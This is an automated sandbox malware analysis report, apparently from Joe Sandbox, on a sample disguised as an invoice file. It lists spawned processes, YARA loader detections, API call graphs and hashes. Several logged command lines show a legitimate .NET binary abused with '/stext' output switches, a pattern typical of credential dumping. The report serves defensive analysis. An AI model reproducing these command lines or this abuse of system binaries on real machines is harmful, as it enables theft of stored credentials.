                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                                Start time:09:23:10
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
                                                                                                                                                                                                                                                                Imagebase:0x940000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                Start time:09:23:13
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
                                                                                                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                                                                                                File size:8704 bytes
                                                                                                                                                                                                                                                                MD5 hash:A07407FCE937593044AD512F4A6D7A1E
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000002.542998195.0000000002653000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000002.551264239.000000000370A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                                Start time:09:23:16
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"
                                                                                                                                                                                                                                                                Imagebase:0x730000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                                                Start time:09:23:16
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"
                                                                                                                                                                                                                                                                Imagebase:0xed0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                                Start time:09:23:17
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
                                                                                                                                                                                                                                                                Imagebase:0x2c0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                                                Start time:09:23:17
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
                                                                                                                                                                                                                                                                Imagebase:0x930000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                                                Start time:09:23:26
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"
                                                                                                                                                                                                                                                                Imagebase:0xe20000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                                                Start time:09:23:27
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"
                                                                                                                                                                                                                                                                Imagebase:0x920000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                                                Start time:09:23:28
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
                                                                                                                                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                                                Start time:09:23:28
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
                                                                                                                                                                                                                                                                Imagebase:0xab0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                                                Start time:09:23:34
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"
                                                                                                                                                                                                                                                                Imagebase:0x560000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                                                Start time:09:23:34
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"
                                                                                                                                                                                                                                                                Imagebase:0xfb0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                                                Start time:09:23:35
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"
                                                                                                                                                                                                                                                                Imagebase:0xfc0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                                                Start time:09:23:42
                                                                                                                                                                                                                                                                Start date:05/01/2023
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"
                                                                                                                                                                                                                                                                Imagebase:0x7ff70b1a0000
                                                                                                                                                                                                                                                                File size:55400 bytes
                                                                                                                                                                                                                                                                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:11.4%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                  Total number of Nodes:106
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                                                                                                                                                  execution_graph 24231 b4b670 GetCurrentProcess 24232 b4b6e3 24231->24232 24233 b4b6ea GetCurrentThread 24231->24233 24232->24233 24234 b4b727 GetCurrentProcess 24233->24234 24235 b4b720 24233->24235 24236 b4b75d 24234->24236 24235->24234 24237 b4b785 GetCurrentThreadId 24236->24237 24238 b4b7b6 24237->24238 24239 b440d0 24240 b440da 24239->24240 24244 b441c1 24239->24244 24249 b43c64 24240->24249 24242 b440f5 24245 b441e5 24244->24245 24253 b442b0 24245->24253 24257 b442c0 24245->24257 24250 b43c6f 24249->24250 24251 b469dd 24250->24251 24265 b45184 24250->24265 24251->24242 24255 b442e7 24253->24255 24254 b443c4 24254->24254 24255->24254 24261 b43de8 24255->24261 24259 b442e7 24257->24259 24258 b443c4 24259->24258 24260 b43de8 CreateActCtxA 24259->24260 24260->24258 24262 b45350 CreateActCtxA 24261->24262 24264 b45413 24262->24264 24266 b4518f 24265->24266 24269 b457e8 24266->24269 24268 b46a85 24268->24251 24270 b457f3 24269->24270 24273 b45818 24270->24273 24272 b46b62 24272->24268 24274 b45823 24273->24274 24277 b45848 24274->24277 24276 b46c62 24276->24272 24278 b45853 24277->24278 24280 b4737e 24278->24280 24283 b4913a 24278->24283 24279 b473bc 24279->24276 24280->24279 24287 b4b290 24280->24287 24292 b49170 24283->24292 24296 b49160 24283->24296 24284 b4914e 24284->24280 24288 b4b2c1 24287->24288 24289 b4b2e5 24288->24289 24329 b4b558 24288->24329 24333 b4b549 24288->24333 24289->24279 24301 b49670 24292->24301 24309 b49661 24292->24309 24293 b4917f 24293->24284 24297 b49170 24296->24297 24299 b49670 2 API calls 24297->24299 24300 b49661 2 API calls 24297->24300 24298 b4917f 24298->24284 24299->24298 24300->24298 24302 b49683 24301->24302 24303 b4969b 24302->24303 24317 b498f8 24302->24317 24321 b498ea 24302->24321 24303->24293 24304 b49693 24304->24303 24305 b49898 GetModuleHandleW 24304->24305 24306 b498c5 24305->24306 24306->24293 24310 b49683 24309->24310 24311 b4969b 24310->24311 24315 b498f8 LoadLibraryExW 24310->24315 24316 b498ea LoadLibraryExW 24310->24316 24311->24293 24312 b49693 24312->24311 24313 b49898 GetModuleHandleW 24312->24313 24314 b498c5 24313->24314 24314->24293 24315->24312 24316->24312 24318 b4990c 24317->24318 24319 b49931 24318->24319 24325 b49288 24318->24325 24319->24304 24322 b4990c 24321->24322 24323 b49931 24322->24323 24324 b49288 LoadLibraryExW 24322->24324 24323->24304 24324->24323 24326 b49ad8 LoadLibraryExW 24325->24326 24328 b49b51 24326->24328 24328->24319 24331 b4b565 24329->24331 24330 b4b59f 24330->24289 24331->24330 24337 b49588 24331->24337 24334 b4b565 24333->24334 24335 b4b59f 24334->24335 24336 b49588 3 API calls 24334->24336 24335->24289 24336->24335 24339 b49593 24337->24339 24338 b4c298 24339->24338 24341 b4be58 24339->24341 24342 b4be63 24341->24342 24343 b45848 3 API calls 24342->24343 24344 b4c307 24342->24344 24343->24344 24348 b4e090 24344->24348 24354 b4e078 24344->24354 24345 b4c340 24345->24338 24350 b4e10d 24348->24350 24351 b4e0c1 24348->24351 24349 b4e0cd 24349->24345 24350->24345 24351->24349 24352 b4e510 LoadLibraryExW GetModuleHandleW 24351->24352 24353 b4e4ff LoadLibraryExW GetModuleHandleW 24351->24353 24352->24350 24353->24350 24355 b4e090 24354->24355 24356 b4e0cd 24355->24356 24357 b4e510 LoadLibraryExW GetModuleHandleW 24355->24357 24358 b4e4ff LoadLibraryExW GetModuleHandleW 24355->24358 24356->24345 24357->24356 24358->24356 24359 b4b898 DuplicateHandle 24360 b4b92e 24359->24360 24361 b4fcd8 24362 b4fd40 CreateWindowExW 24361->24362 24364 b4fdfc 24362->24364
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #}e
                                                                                                                                                                                                                                                                  • API String ID: 0-3047172054
                                                                                                                                                                                                                                                                  • Opcode ID: d762ff7a4aa0babfa4ad68be3bf1670e2428328d43515ff98d03b7b3118c8dfa
                                                                                                                                                                                                                                                                  • Instruction ID: 194d8159f74d865e051184b985a39afb89379383d49d70481c0eab5ac281882f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d762ff7a4aa0babfa4ad68be3bf1670e2428328d43515ff98d03b7b3118c8dfa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46A1D3B4E01218CFEB14DFA9D844BAEBBB6FB89344F148169D409BB358DB345A85CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #}e
                                                                                                                                                                                                                                                                  • API String ID: 0-3047172054
                                                                                                                                                                                                                                                                  • Opcode ID: f7c1361a696a45582bb9478a3976d8689c50167f5c17d3a139a000b436c1d24a
                                                                                                                                                                                                                                                                  • Instruction ID: 7e7af8d95c0ad41dcc9708a2ce7c0e77b02b20cc256ee3da3afc0bde81e90efb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7c1361a696a45582bb9478a3976d8689c50167f5c17d3a139a000b436c1d24a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E091F7B4E00218CFDB54DF69D844BADBBF6FB89344F1481AAD809AB355DB345A81CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #}e
                                                                                                                                                                                                                                                                  • API String ID: 0-3047172054
                                                                                                                                                                                                                                                                  • Opcode ID: 85e66e1a1af74d27976f6ef13a0f18423dd4611bc03eae93ed628ca53283bb03
                                                                                                                                                                                                                                                                  • Instruction ID: 5a891559d12d4fdcfbd340adf058e60ca67e399f8f83d490fdbd53cbace5d3dd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85e66e1a1af74d27976f6ef13a0f18423dd4611bc03eae93ed628ca53283bb03
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9591E5B4E01218CFEB14DF69C944BADBBF6FB89344F1481A9D409AB398DB345985CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 21e40d8efa1d30c85a79d5df0131e25533be9e7350c482dfcfa04e848ae99c13
                                                                                                                                                                                                                                                                  • Instruction ID: a330682a7c0cd9d8bc7fc1ba3a616c46f109ceba33ec35b68f3d10a2ac0c708b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21e40d8efa1d30c85a79d5df0131e25533be9e7350c482dfcfa04e848ae99c13
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B432A0B0A1060ACFCB15DF78C84469DB7B2FF99300F1185A9D445EB261EF74E989CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a2e68d9368190c3915eca98120236a8e4ea817b5f1e4afd8ba5391c6a629898e
                                                                                                                                                                                                                                                                  • Instruction ID: 81e1bb2473280df4d98cf6ada23d8597688d5402434086fd0381798e0c45fb0c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2e68d9368190c3915eca98120236a8e4ea817b5f1e4afd8ba5391c6a629898e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9024DB1919218CFDB20CF69C844BEDB7B9FB4E344F1056AAC609BB295D7746984CF02
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8438155e78e8d45c230d81d5726c84f95677968acc60677841e9240b32d31cc1
                                                                                                                                                                                                                                                                  • Instruction ID: f4ba6c75b5d5dca520f5eef164c3e00bf0beff3f2e60b52a5e0bf814eb9d1877
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8438155e78e8d45c230d81d5726c84f95677968acc60677841e9240b32d31cc1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 215158B4E042098FDB04DFA9C8806AEBBF6FF8D304F14856AD419EB355DB34AA51CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 06bc515a595c2bf6de1ce2228594b28993b9fc88a4c09dc2801e3c078ded29ae
                                                                                                                                                                                                                                                                  • Instruction ID: f7ba98475bc1e8ec6ccd66f3e9e326ea26e895006a4ac421eda867b15c2b0923
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06bc515a595c2bf6de1ce2228594b28993b9fc88a4c09dc2801e3c078ded29ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 844155B4E002198FDB04DFA9C880AAEBBF6FF8D344F148529D419EB355DB38A951CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B4B6D0
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B4B70D
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B4B74A
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B4B7A3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                  • Opcode ID: 85026d8ebb4b7cf93d646f706c297da19430835142c2a2941f88631403a6bff7
                                                                                                                                                                                                                                                                  • Instruction ID: 8a107ab27f609cd961eb7ad086165315871c011fd04b04b3d2fe066493c91615
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85026d8ebb4b7cf93d646f706c297da19430835142c2a2941f88631403a6bff7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 995156B49002498FDB14CFAAC948BAEBBF1EF88314F248499E519A7350D774A944CF65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B4B6D0
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B4B70D
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B4B74A
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B4B7A3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2063062207-0
